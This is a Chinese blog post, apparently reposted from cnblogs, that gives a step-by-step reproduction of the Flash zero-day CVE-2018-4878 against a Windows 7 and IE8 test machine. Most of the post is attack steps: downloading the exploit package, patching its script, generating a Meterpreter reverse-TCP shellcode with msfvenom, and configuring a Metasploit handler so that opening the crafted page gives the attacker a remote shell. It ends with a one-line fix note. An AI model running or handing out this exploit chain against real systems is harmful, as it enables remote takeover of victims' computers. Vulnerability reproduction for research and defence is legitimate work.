博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Flash 0day CVE-2018-4878 漏洞复现
阅读量:4598 次
发布时间:2019-06-09

本文共 1322 字,大约阅读时间需要 4 分钟。

 

0x01 前言

Adobe公司在当地时间2018年2月1日发布了一条安全公告:

公告称一个新的Flash 0Day漏洞(CVE-2018-4878)已经存在野外利用,可针对Windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意 Flash 代码文件的 Microsoft Office 文档、网页、垃圾电子邮件等。

0x02 漏洞影响

Flash Player当前最新版本28.0.0.137以及之前的所有版本

0x03 漏洞复现

环境测试:

攻击机:kali 

目标靶机:win7x64 +IE8.0+FLASH player28.0.0.137

1.下载cve-2018-4878的脚步利用

wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar

2.解压压缩文件后,可看到cve-2018-4878.py和exploit.swf

3.我们需要对cve-2018-4878.py进行修改,原作者将代码中的stageless变量改成了true,正确的应该改成:stageless = False。附上原作者的exp地址:https://github.com/anbai-inc/CVE-2018-4878.git

 

4.其次需要修改替换原来弹计算器的shellcode

5.在kali下生成msf的shellcode:

msfvenom  -pwindows/meterpreter/reverse_tcplhost=your host  lport=your port  -fpython>shellcode.txt

6.将生成的shellcode替换掉原有cve-2018-4878.py中的shelldoce即可

7.在kal下执行cve-2018-4878.py,这里需要和index.html在一个目录下,即可生成恶意的exploit.swf

8.这里为了演示我将index.html和exploit.swf一同拷贝到目标靶机win7x64上,在ie浏览器下打开(也可以通过搭建web服务器的形式将index.html和exploit.swf放在web目录下,访问地址来打开)。

9.在msf 下进行监听设置

msf > use exploit/multi/handler

msf exploit(handler) > set payloadwindows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost  10.0.0.217

msf exploit(handler) > set lport  443

msf exploit(handler) > exploit

 

10.当打开目标恶意的index.html页面时,即可触发反弹shell

 

0x04 漏洞修复

建设通过官方网站升级到最新版本

https://get.adobe.com/cn/flashplayer/

 

 

 
 
 
 

转载于:https://www.cnblogs.com/backlion/p/8523299.html

你可能感兴趣的文章
前端构建工具gulp
查看>>
ref:CodeIgniter框架内核设计缺陷可能导致任意代码执行
查看>>
1475.ip数据包解析
查看>>
JAVA 笔记(一)
查看>>
jdk+Tomcat部署安装
查看>>
js 循环读取 json的值
查看>>
c# 范型Dictionary实用例子
查看>>
SPOJ FIBPOL - Fibonacci Polynomial
查看>>
C#实现动态页面静态化
查看>>
windows下python一些库编译问题
查看>>
centos 7设置limit,不生效问题
查看>>
外部引用CSS中 link与@import的区别
查看>>
各种语言学习
查看>>
将博客搬至CSDN
查看>>
计算机硬盘大小转换(B,KB,MB,GB,TB,PB之间的大小转换)
查看>>
10.2计数与概率基础
查看>>
ssh无密码登陆
查看>>
使用django book2.0 时候,输入python manage.py sqlall books 报错解决办法
查看>>
Linux中docker的使用
查看>>
编译器选项
查看>>